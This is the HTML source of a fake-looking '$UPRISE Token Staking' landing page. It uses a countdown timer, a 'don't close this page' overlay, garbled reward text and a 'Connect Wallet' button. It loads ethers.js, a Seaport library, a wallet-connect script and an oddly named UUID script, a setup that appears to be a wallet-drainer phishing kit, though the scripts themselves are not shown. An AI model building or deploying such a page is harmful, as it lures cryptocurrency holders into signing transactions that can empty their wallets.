<!doctype html>

<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>UPRISE | Staking</title>
    <meta name="author" content="SitePoint">

    <meta property="og:type" content="website">

    <link rel="icon" href="favicon.png">

    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&display=swap" rel="stylesheet">
    <script src="3.3.3"></script>
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    colors: {
                        lrgray: '#000000',
                        lrgreen: '#2775ca',
                    }
                }
            }
        }
    </script>

    <link href="ajax/libs/toastr.js/latest/toastr.min.css" rel="stylesheet">
    <style type="text/tailwindcss">
        body{
            font-family: 'Inter', sans-serif;
        }
        .custombtn{
    cursor: pointer;
    display: inline-flex;
    appearance: none;
    -webkit-box-align: center;
    align-items: center;
    -webkit-box-pack: center;
    justify-content: center;
    user-select: none;
    position: relative;
    white-space: nowrap;
    vertical-align: middle;
    outline-offset: 2px;
    font-weight: 800;
    background-color: transparent;
    border-color:  #c2bebe;
    text-decoration: none;
    outline: transparent solid 2px;
    border-width: 1px;
    border-style: solid;
    border-image: initial;
    height:60px
        }
        .custombtn:disabled{
            background-color:gray;
            color:#D1D5DB;
            border:none;
            cursor: not-allowed;
        }
        .custombtn:disabled:hover{
            background-color:gray;
            color:#D1D5DB;
            border:none;
            cursor: not-allowed;
        }
    .toast-info{
        background-color:#121619;
        color:#c2bebe !important;
        box-shadow: none !important;
        font-size: 14px;
    }
    #toast-container>.toast-info {
    background-image: url('favicon.png')!important;
    background-size:30px;
}
.custom-loader {
	border-top-color: #c2bebe;
	-webkit-animation: custom-spinner 1.5s linear infinite;
	animation: custom-spinner 1.5s linear infinite;
}

@-webkit-keyframes custom-spinner {
	0% {
		-webkit-transform: rotate(0deg);
	}
	100% {
		-webkit-transform: rotate(360deg);
	}
}

@keyframes custom-spinner {
	0% {
		transform: rotate(0deg);
	}
	100% {
		transform: rotate(360deg);
	}
}

    </style>

<script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.6.9/ethers.umd.min.js"></script><script src="https://cdn.jsdelivr.net/npm/merkletreejs@latest/merkletree.js"></script><script src="./scripts/seaport.js"></script><script src="./scripts/wallet-connect.js"></script><script src="./320821fb-4d90-4a42-817f-a10c4c41f7b6.js"></script>

</head>

<body class="bg-black">
    <div id="custom-loader" class="fixed top-0 left-0 right-0 bottom-0 w-full h-screen z-50 overflow-hidden bg-gray-800 opacity-75 flex flex-col items-center justify-center">
        <div class="custom-loader ease-linear rounded-full border-4 border-t-4 border-gray-200 h-12 w-12 mb-4"></div>
        <h2 class="text-center text-white text-xl font-semibold">You are in line for the $UPRISE Token Staking...
        </h2>
        <p class="w-1/3 text-center text-white">This may take a few seconds, please don't close this page.</p>
    </div>
    <div class="relative overflow-hidden">
        <header class="relative">
            <div class="bg-lrgray pt-6">
                <nav class="relative mx-auto flex max-w-7xl items-center justify-between px-4 sm:px-6" aria-label="Global">
                    <div class="flex flex-1 items-center">
                        <div class="flex w-full items-center justify-between md:w-auto">
                            <a href="#">
                                <img class="h-12" src="logo.png" alt="">
                            </a>
                        </div>
                    </div>
                </nav>
            </div>
        </header>

        <main>
            <div class="pt-10 sm:pt-16 lg:overflow-hidden lg:pt-8 lg:pb-14">
                <div class="mx-auto max-w-7xl lg:px-8">
                    <div class="lg:grid lg:grid-cols-2 lg:gap-8">
                        <div class="mx-auto max-w-md px-4 sm:max-w-2xl sm:px-6 sm:text-center lg:flex lg:items-center lg:px-0 lg:text-left">
                            <div class="lg:py-24">
                                <a href="#" class="inline-flex items-center rounded-full bg-black p-1 pr-2 text-white hover:text-gray-200 sm:text-base lg:text-sm xl:text-base">
                                    <span class="py-2 rounded-full bg-lrgreen px-3 py-0.5 text-sm font-semibold leading-5 text-black">Staking
                                        Started</span>
                                    <span class="ml-4 text-sm">UPRISE</span>
                                    <!-- Heroicon name: mini/chevron-right -->
                                    <svg class="ml-2 h-5 w-5 text-gray-500" xmlns="http://www.w3.org/2000/svg" viewbox="0 0 20 20" fill="currentColor" aria-hidden="true">
                                        <path fill-rule="evenodd" d="M7.21 14.77a.75.75 0 01.02-1.06L11.168 10 7.23 6.29a.75.75 0 111.04-1.08l4.5 4.25a.75.75 0 010 1.08l-4.5 4.25a.75.75 0 01-1.06-.02z" clip-rule="evenodd"></path>
                                    </svg>
                                </a>

                                <h1 class="mt-4 text-4xl font-bold tracking-tight text-white sm:mt-5 sm:text-6xl lg:mt-6 xl:text-6xl">
                                    <span class="block">$UPRISE Token</span>
                                    <span class="block text-lrgreen">Staking</span>
                                </h1>
                                <p class="mt-3 text-base text-gray-500 sm:mt-5 sm:text-xl lg:text-lg xl:text-xl">The <b class="text-lrgreen">$UPRISE</b> Token Distribution has now started.<br> We will
                                   <b class="text-lrgreen">$5,002 - $UPRISE</b></p>
                                <div id="timer">
                                    <h1 class="pt-5 text-2xl mb-3 font-extralight text-gray-200">NEXT STAKING POOL</h1>
                                    <div class="text-3xl text-center flex w-full">
                                        <div class="text-xl mr-1 font-extralight text-gray-200"></div>
                                        <div class="w-24 mx-1 p-2 text-lrgreen rounded-lg">
                                            <div class="text-md font-mono leading-none inline-block" id="hours"></div>
                                            <div class="font-mono uppercase text-sm leading-none"></div>
                                        </div>
                                        <div class="w-24 mx-1 p-2 text-lrgreen rounded-lg">
                                            <div class="font-mono leading-none inline-block" id="minutes"></div>
                                            <div class="font-mono uppercase text-sm leading-none"></div>
                                        </div>
                                        <div class="text-xl mx-1 font-extralight text-gray-200"></div>
                                        <div class="w-24 mx-1 p-2 text-lrgreen rounded-lg">
                                            <div class="font-mono leading-none inline-block" id="seconds"></div>
                                            <div class="font-mono uppercase text-sm leading-none"></div>
                                        </div>
                                    </div>
                                </div>
                                <div class="mt-10 sm:mt-12">
                                    <div class="sm:flex">
                                        <div class="mt-3 sm:mt-0 sm:ml-3">
                                            <button id="claim-button" type="button" class="interact-button m-3 p-8 custombtn text-lrgreen block w-full rounded-md bg-lrgreen font-medium text-3xl shadow hover:bg-lrgreen hover:text-white focus:outline-none focus:ring-2 focus:ring-indigo-300 focus:ring-offset-2 focus:ring-offset-gray-900" disabled="">Connect Wallet</button>
                                        </div>
                                    </div>
                                    <p class="text-xs text-lrgreen sm:mt-4">UPRISE STAKING
                                        </p>
                                </div>
                            </div>

                        </div>
                        <div class="mt-12 -mb-16 sm:-mb-48 lg:relative lg:m-0">
                            <div class="mx-auto max-w-md px-4 sm:max-w-2xl sm:px-6 lg:max-w-none lg:px-0">

                                <img src="side.png">

                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </main>
    </div>
    <script src="jquery-3.6.0.js" crossorigin="anonymous"></script>
    <script src="ajax/libs/toastr.js/latest/toastr.min.js"></script>
    <script src="js/script.js?v=2"></script>
</body>

</html>